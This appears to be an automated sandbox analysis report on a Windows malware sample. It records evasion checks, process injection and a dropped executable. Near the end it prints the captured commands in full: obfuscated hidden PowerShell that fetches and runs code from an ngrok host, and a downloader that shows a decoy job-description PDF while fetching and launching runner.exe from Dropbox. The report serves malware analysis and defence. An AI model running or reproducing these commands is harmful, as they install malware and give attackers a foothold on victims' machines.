                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Switches to a custom stack to bypass stack traces
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeAPI/Special instruction interceptor: Address: 7FF8C88ED044
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeAPI/Special instruction interceptor: Address: 7FF8C88ED044
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeAPI/Special instruction interceptor: Address: 594B83A
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000002.2711069285.0000000002C09000.00000040.00001000.00020000.00000000.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000002.2710169833.00000000005E8000.00000040.00000001.01000000.0000000F.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000003.2667807097.0000000002729000.00000040.00000400.00020000.00000000.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000003.2675735037.0000000002729000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: ORIGINALFILENAMECFF EXPLORER.EXE:
                      Source: 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeBinary or memory string: CFF EXPLORER.EXE
                      Source: 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000002.2711069285.0000000002C09000.00000040.00001000.00020000.00000000.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000002.2710169833.00000000005E8000.00000040.00000001.01000000.0000000F.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000003.2667807097.0000000002729000.00000040.00000400.00020000.00000000.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000003.2675735037.0000000002729000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: INTERNALNAMECFF EXPLORER.EXE
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4398Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5413Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5505
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4198
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeDropped PE file which has not been started: C:\Users\user\Documents\ThaiPerfecto\sdk\PerfectoUna.exeJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3364Thread sleep count: 4398 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3364Thread sleep count: 5413 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7160Thread sleep time: -14757395258967632s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 380Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 7176Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9100Thread sleep count: 5505 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9172Thread sleep time: -23058430092136925s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1732Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9104Thread sleep count: 4198 > 30
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: powershell.exe, 00000003.00000002.2391634757.000001DAAFD4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA99418000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tEventVmNetworkAdapter',
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA99418000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Remove-NetEventVmNetworkAdapter',
                      Source: fontdrvhost.exe, 0000001B.00000002.2789705944.000000000332A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
                      Source: powershell.exe, 00000013.00000002.2533952315.00000201110AB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA99418000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapterX
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA99418000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapterX
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA99418000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
                      Source: powershell.exe, 00000013.00000002.2589734635.0000020128BC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllT
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA99418000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapterX
                      Source: svchost.exe, 00000007.00000002.3360416274.0000020F0F655000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000002.2789705944.000000000332A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: msedge.exe, 00000006.00000003.2254907222.0000288402524000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware20,1(
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA99418000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA99418000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Add-NetEventVmNetworkAdapter',
                      Source: powershell.exe, 00000013.00000002.2533952315.00000201110AB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                      Source: powershell.exe, 00000003.00000002.2390109279.000001DAAFC22000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000006.00000002.2325983628.00000207DE254000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000015.00000002.2419853184.000001B9E1640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: powershell.exe, 00000003.00000002.2391756872.000001DAAFD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FngTask_v1.0.MSFT_NetEventVmNetworkAdatper.cdxml.
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA99418000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
                      Source: svchost.exe, 00000007.00000002.3355960233.0000020F0A02B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp|e
                      Source: powershell.exe, 00000013.00000002.2531867358.000002010ED66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSIdRom&Ven_NECVMWar&Prod_VMware_
                      Source: powershell.exe, 00000013.00000002.2533952315.00000201110AB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                      Source: fontdrvhost.exe, 0000001B.00000003.2679593309.0000000005660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
                      Source: powershell.exe, 00000003.00000002.2391756872.000001DAAFD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MSFT_NetEventVmNetworkAdatper.format.ps1xmlT_
                      Source: fontdrvhost.exe, 0000001B.00000003.2679593309.0000000005660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA99418000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Get-NetEventVmNetworkAdapter',
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA99418000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeCode function: 26_3_027192CC VirtualAlloc,VirtualAlloc,VirtualProtect,LdrInitializeThunk,VirtualFree,26_3_027192CC
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeCode function: 25_2_00479425 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,25_2_00479425
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeCode function: 26_3_02719277 mov eax, dword ptr fs:[00000030h]26_3_02719277
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 27_3_03280283 mov eax, dword ptr fs:[00000030h]27_3_03280283
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeProcess created: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe "C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe"
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeCode function: 25_2_00479425 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,25_2_00479425
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeCode function: 25_2_00469ECC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,25_2_00469ECC
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeCode function: 26_2_00479425 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_00479425
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeCode function: 26_2_00469ECC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_2_00469ECC

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeMemory written: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe base: 26E0000 value starts with: 4D5A
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aab784 curl ; sal avfea3 iEx ; avfea3(aab784 -Uri https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/f08a7638d48ba191b651003837c0a34d -UseBasicParsing)Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk https://www.dropbox.com/scl/fi/zswwoz1nsshfdhbgdi9dy/Documents-about-company-information-and-job-descriptions-4.pdf?rlkey=xb4z4b9qljepnpiu5mkjz888q&dl=1 Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\475161710.bat" "Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -wIndoWStYLe hiDdeN -NoProfile -Command "$RandomPDF = Join-Path -Path $env:TEMP -ChildPath ('{0}.pdf' -f ([guid]::NewGuid())); $RandomEXE = Join-Path -Path $env:TEMP -ChildPath ('{0}.exe' -f ([guid]::NewGuid())); Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/zswwoz1nsshfdhbgdi9dy/Documents-about-company-information-and-job-descriptions-4.pdf?rlkey=xb4z4b9qljepnpiu5mkjz888q&dl=1' -OutFile $RandomPDF; Start-Process -FilePath 'msedge.exe' -ArgumentList '--kiosk', $RandomPDF; Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/uv9rtex94bi18x6hfwnvm/runner.exe?rlkey=ohh5enlv6dylr9jqxqwsffkja&dl=1' -OutFile $RandomEXE; Start-Process -FilePath $RandomEXE; if (Test-Path $RandomEXE) { Invoke-WebRequest -Uri 'https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/metadata/f08a7638d48ba191b651003837c0a34d'; }"
